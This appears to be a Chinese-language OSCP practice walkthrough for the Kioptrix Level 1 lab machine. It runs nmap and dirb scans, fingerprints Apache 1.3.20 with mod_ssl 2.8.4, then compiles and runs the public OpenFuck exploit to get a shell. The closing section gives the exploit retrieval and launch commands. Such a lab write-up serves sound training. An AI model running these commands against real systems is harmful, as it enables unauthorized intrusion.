目录
前言
1. 主机发现
2. 端口扫描
3. 指纹识别
4. 目录扫描
5. 漏洞搜索和利用
前言
oscp备考,oscp系列——Kioptix Level 1靶场 Kioptix Level 1难度为简单靶场,主要考察
-
nmap的使用已经是否会看输出,以及是否会通过应用查找对应漏洞
-
主要有mod_ssl低版本的getshell漏洞和samba的溢出getshell漏洞(CVE-2007-2447)
-
nmap不能探测出samba版本,需要使用msf的smb_version进行探测
下载地址:
https://pan.quark.cn/s/f089a166724f
1. 主机发现
nmap -sP 192.168.139.0/24
-sP 参数是 nmap 的一个选项,用于执行 ping 扫描(Ping Sweep)。这种扫描类型会发送 ICMP ECHO_REQUEST 包(ping 请求)到指定的目标地址,以确定哪些主机是活动的(即在线的)。它不会对目标主机的端口进行扫描,只是检查主机是否在线
靶机信息
IP地址:192.168.139.200 Mac地址:00:0c:29:15:78:e4
2. 端口扫描
nmap -sT -sV 192.168.139.200
-
-sT:这个参数指定进行 TCP 连接扫描(TCP Connect Scan)。这种扫描类型会尝试对目标主机的每个指定端口建立一个完整的 TCP 连接。如果连接成功,那么该端口被认为是开放的。 -
-sV:这个参数用于版本侦测(Version Detection)。Nmap 会尝试确定目标主机上开放的端口上运行的服务的版本信息。 -
-sS参数在 Nmap 中用于执行 SYN 扫描,这是一种 TCP 扫描技术,也被称为半开放扫描。在 SYN 扫描中,Nmap 发送一个 SYN 包到目标端口,如果收到一个 SYN-ACK 响应,表示端口是开放的;如果收到一个 RST(重置)包,表示端口是关闭的。Nmap 不会发送 ACK 包来完成 TCP 三次握手,因此不会在目标主机上建立完整的连接。
这种扫描方式的优势在于:
-
快速:由于不需要完成完整的 TCP 连接,SYN 扫描可以更快地扫描大量端口。
-
隐蔽:SYN 扫描不会在目标主机上留下完整的连接记录,因此不太可能被目标主机上的应用程序察觉。
-
防火墙友好:SYN 扫描可以穿过一些只允许出站连接的防火墙,因为它们不需要目标主机发送入站数据。
-p:22.80,111,139,443.1024:指定扫描这些端口,涵盖常见服务对应的端口,像SSH、HTTP等服务端口。-sV:探测端口上服务的具体版本。-sC:运行默认脚本扫描,检测相关安全情况等。-O:探测目标主机运行的操作系统类型
端口22和端口80开放
访问80端口 随便点点 发现不断提示redhat
根据扫出来的端口进行漏洞探测
nmap 192.168.139.200 -p 22,80,111,139,443,1024 -oA 1.txt --script=vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 13:41 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.139.200
Host is up (0.00054s latency).PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
| /test.php: Test page
| /icons/: Potentially interesting directory w/ listing on 'apache/1.3.20'
| /manual/: Potentially interesting directory w/ listing on 'apache/1.3.20'
|_ /usage/: Potentially interesting folder
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
3. 指纹识别
whatweb -v
WhatWeb report for http://192.168.139.200
Status : 200 OK
Title : Test Page for the Apache Web Server on Red Hat Linux
IP : 192.168.139.200
Country : RESERVED, ZZSummary : Apache[1.3.20][mod_ssl/2.8.4], Email[webmaster@example.com], HTTPServer[Red Hat Linux][Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 Ope nSSL/0.9.6b], OpenSSL[0.9.6b]Detected Plugins:
[ Apache ]The Apache HTTP Server Project is an effort to develop andmaintain an open-source HTTP server for modern operatingsystems including UNIX and Windows NT. The goal of thisproject is to provide a secure, efficient and extensibleserver that provides HTTP services in sync with the currentHTTP standards.Version : 1.3.20 (from HTTP Server Header)Module : mod_ssl/2.8.4Google Dorks: (3)Website : http://httpd.apache.org/[ Email ]Extract email addresses. Find valid email address andsyntactically invalid email addresses from mailto: linktags. We match syntactically invalid links containingmailto: to catch anti-spam email addresses, eg. bob atgmail.com. This uses the simplified email regularexpression fromhttp://www.regular-expressions.info/email.html for validemail address matching.String : webmaster@example.com[ HTTPServer ]HTTP server header string. This plugin also attempts toidentify the operating system from the server header.OS : Red Hat LinuxString : Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b (from server string)[ OpenSSL ]The OpenSSL Project is a collaborative effort to develop arobust, commercial-grade, full-featured, and Open Sourcetoolkit implementing the Secure Sockets Layer (SSL v2/v3)and Transport Layer Security (TLS v1) protocols as well asa full-strength general purpose cryptography library.Version : 0.9.6bWebsite : http://www.openssl.org/HTTP Headers:HTTP/1.1 200 OKDate: Fri, 20 Dec 2024 06:20:47 GMTServer: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6bLast-Modified: Thu, 06 Sep 2001 03:12:46 GMTETag: "8805-b4a-3b96e9ae"Accept-Ranges: bytesContent-Length: 2890Connection: closeContent-Type: text/html
4. 目录扫描
dirb
dirb http://192.168.139.200-----------------
DIRB v2.22
By The Dark Raver
-----------------START_TIME: Fri Dec 20 13:27:58 2024
URL_BASE: http://192.168.139.200/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612---- Scanning URL: http://192.168.139.200/ ----
+ http://192.168.139.200/~operator (CODE:403|SIZE:273)
+ http://192.168.139.200/~root (CODE:403|SIZE:269)
+ http://192.168.139.200/cgi-bin/ (CODE:403|SIZE:272)
+ http://192.168.139.200/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.139.200/manual/
==> DIRECTORY: http://192.168.139.200/mrtg/
==> DIRECTORY: http://192.168.139.200/usage/---- Entering directory: http://192.168.139.200/manual/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.(Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.139.200/mrtg/ ----
+ http://192.168.139.200/mrtg/index.html (CODE:200|SIZE:17318)---- Entering directory: http://192.168.139.200/usage/ ----
+ http://192.168.139.200/usage/index.html (CODE:200|SIZE:4279)-----------------
END_TIME: Fri Dec 20 13:28:30 2024
DOWNLOADED: 13836 - FOUND: 6
目录
http://192.168.139.200/usage/index.html
http://192.168.139.200/usage/
http://192.168.139.200/mrtg/
http://192.168.139.200/manual/
manual目录下有mod_ssl
/manual/mod/mod_ssl/ 目录下有版本号
根据官网提示和信息收集 多次提到appache的redhat
(Red-Hat/Linux) mod_ssl/2.8.4
5. 漏洞搜索和利用
searchsploit搜索 mod_ssl 2.8.4
根据版本号有三个poc
经过尝试第三个可以利用
searchsploit -p 47080查找 漏洞路径和url
这里提示编译需要使用命令:gcc -o OpenFuck OpenFuck.c -lcrypto
下载OpenFuck.c并安装libssl-dev
git clone https://github.com/heltonWernik/Openluck
下载完 进入Openluck目录,进行编译 编译不成功
执行“./OpenFuck”命令,即可获得该执行文件的使用说明。
根据目标主机的操作系统、Apache版本不同选择不同参数,由上述信息收集可知,目标主机运行着RedHat Linux系统,Apache版本1.3.20,满足该条件的参数有两个,分别是0x6a和0x6b。
依次执行命令
./OpenFuck 0x6a 192.168.139.200 80 -c 50
./OpenFuck 0x6b 192.168.139.200 80 -c 50
./OpenFuck 0x6a 192.168.139.200 443 -c 50
./OpenFuck 0x6b 192.168.139.200 443 -c 50
最后一个才成功提权
